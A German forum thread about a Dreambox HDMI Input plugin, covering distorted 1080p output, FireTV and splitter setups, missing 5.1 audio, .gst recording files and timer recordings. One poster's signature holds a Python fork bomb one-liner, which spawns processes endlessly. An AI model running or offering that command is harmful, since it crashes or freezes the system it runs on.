HDMI Input Plugin

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • sooooo, jetzt beruhigen sich mal ALLE wieder, weil, so ist keinem wirklich geholfen.

      PS: nur das reine Vorhandensein einer HDMI-IN Buchse war unter anderem ein Kaufgrund für dich? Ich glaube da haben sich anfangs sehr viele darüber aufgeregt, dass mit dem Anschluss nix anzufangen war.
    • hallo,
      warum wird das hdmicec plugin nirgends angezeigt,
      weder unter erwiterung noch einstellungen, auch nach neustart nicht

      hat sich erledigt, funktioniert bei mir nicht

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von zockerpit ()

    • Hallo Zusammen

      Habe gerade das HDMI-IN Plugin ausprobiert nach dem neuen Update.
      1. Danke fürs fixen, gind aber schnell. Top arbeit, die ihr da immer leistet.
      2. Habe vor dem Update meine SNES Mini auf 1080p gestellt gehabt, Bild war so wie es sein sollte. Jetzt wird es völlig verzerrt dargestellt, mit 1080i und kleiner, kein Problem, aber alles was 1080p und grösser ist, wird verzerrt dargestellt.

      Ist nur eine Rückmeldung und soll bitte nicht böse angeschaut werden, kann meien SNES Mini auch problemlos mit 1080i betreiben.

      Gruss Richi
    • Wird von einem der beiden Plugin's auch der FireTV-Stick an einer 920uhd unterstützt?

      Hat schon jemand Erfahrung mit der Kombination FireTV und Dreambox HDMI-In algemien?
      PlugIn's: AMS, Autotimer, Seriesplugin, Cool Guide, Epgrefresh/backup, SerienRecorder, MediaPortal
    • MarkoP schrieb:

      Wird von einem der beiden Plugin's auch der FireTV-Stick an einer 920uhd unterstützt?

      Hat schon jemand Erfahrung mit der Kombination FireTV und Dreambox HDMI-In algemien?
      Hab eine Firestick an der 7080 läuft soweit ganz gut das einzige was ich leider nicht hin bekomme ist der Dolby ton, bei mir an der anlage kommt immer nur 2 Kanal raus, vieleicht hat da ja noch einer einen Tip für mich.

      Ich habe den Stick in dem Spliter von da aus geht einmal ein Kabel zur dream und eins zum TV, so das man auch, wenn man will, ohne der Dream den Stick benutzen kann.

      Aber egal was ich bei dem blauen untermenü bei ton einstelle wenn ich bei Amazone ein Film ( man of Steel in dem test ) schaue bekomme ich nur Stereo hin.
      Gibs bei Amazone keine 5.1 oder geht mit dem Plugin einfach nicht ?
      Mfg Digi-Bit
    • Hallo,

      ich habe gerade meinen Splitter mit dem FireTV 4K und meiner 7080 verbunden. Läuft super mit dem Plugin vom Feed.
      Ton kommt syncron über meine 5.1 Anlage raus. Den Rest (Aufnahme usw.) muß ich noch testen bzw. einlesen.

      Vielen Dank.

      Gruß

      WI4
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X, 1 TB SSD an OLED65C97LA, 1 x 7080 HD an 55UM74507LA, 2 x One , 1 x Two :] , 520HD DVB-T2
    • Das Plugin von uns macht primär die hdmi-in umschaltung was man da am Ton überhaupt ändern kann müsste man erst mal ermitteln da mir so eine hardware aber nicht zur verfügung steht wirds schwierig aber vielleicht gehts ja mit bereits vorhanden plugins.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo,

      ich habe seit ein paar Tagen eine Dreambox 920 und bin mit der Installation der newnigma2 und den für mich interessanten Plugins gut klargekommen.
      Vielen Dank für die viele Arbeit die Ihr Euch macht!!

      Mit dem HDMI Input Plugin konnte ich nun von meinem Sky Receiver noch einige Inhalte der Festeplatte retten, bevor er zurück wandert.

      Jetzt habe ich ein Problem bzw. eine evtl. sau dumme Frage??:
      Alle aufgezeichneten Filme haben eine Endung mit der Bezeichnung *.gst.

      Auf der Dreambox sind diese natürlich gut abspielbar, allerdings möchte ich sie auf den PC kopieren und dort schneiden und auf Blu-Ray weiterverarbeiten.
      Das Format sagt mir nichts und habe ich auch noch nicht gehört. Forensuche und Google haben mir nicht weitergeholfen.

      Habt ihr einen Tipp wie ich das Format ohne Qualitätsverluste umwandeln kann bzw. kann man das Aufnahmeformat ändern?

      Viele liebe Grüße
      datenstrom
    • datenstrom schrieb:

      Hallo,

      ich habe seit ein paar Tagen eine Dreambox 920 und bin mit der Installation der newnigma2 und den für mich interessanten Plugins gut klargekommen.
      Vielen Dank für die viele Arbeit die Ihr Euch macht!!

      Mit dem HDMI Input Plugin konnte ich nun von meinem Sky Receiver noch einige Inhalte der Festeplatte retten, bevor er zurück wandert.

      Jetzt habe ich ein Problem bzw. eine evtl. sau dumme Frage??:
      Alle aufgezeichneten Filme haben eine Endung mit der Bezeichnung *.gst.

      Auf der Dreambox sind diese natürlich gut abspielbar, allerdings möchte ich sie auf den PC kopieren und dort schneiden und auf Blu-Ray weiterverarbeiten.
      Das Format sagt mir nichts und habe ich auch noch nicht gehört. Forensuche und Google haben mir nicht weitergeholfen.

      Habt ihr einen Tipp wie ich das Format ohne Qualitätsverluste umwandeln kann bzw. kann man das Aufnahmeformat ändern?

      Viele liebe Grüße
      datenstrom
      wie nimmst du den auf ?
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Hallo nixkoenner,


      danke für die schnelle Rückmeldung.



      Ich habe

      + HDMI Input Plugin von gutemine
      + Streaming Server (RTSP Server) eingerichtet
      + Favoiten Bouquet den HDMI IN ausgewählt
      + Über Rec gestartet

      Es werden 3 Dateien erzeugt:
      *.gst.meta
      *.gst (offenbar sind hier die Informationen enthalten, da 7 GB groß)
      *.gst.meta (doppelt)

      Ich hatte das so verstanden, dass die Aufnahme des HDMI Input "nur" über den Streaming Server funktioniert.

      VIele Grüße
      datenstrom
    • Frage zu HDMI Plugin, Fire TV und Splitter:
      Beim Einsatz eines Splitters (wie öfters hier erwähnt) vor einer DM920 und dem HDMI Plugin, kann man dann Übertragungen des Fire Tv‘s aufnehmen und wenn ja, wie?
      Kann man die Aufnahmezeit programmieren oder per Sofortaufnahme, oder wie?
    • du kannst entweder einen expliziten timer auf dem hdmi input channel anlegen oder draufzappen und mit der rec taste eine sofortaufnahme starten, wie bei jedem anderen kanal. Nur timer aus dem nicht vorhandenen epg geht natürlich nicht.
    • gutemine schrieb:

      du kannst entweder einen expliziten timer auf dem hdmi input channel anlegen oder draufzappen und mit der rec taste eine sofortaufnahme starten, wie bei jedem anderen kanal. Nur timer aus dem nicht vorhandenen epg geht natürlich nicht.
      Schon mal merçi!
      Timer anlegen bedeutet einen Timer z.B. mit vorgegebener Zeiten (Start und Ende)?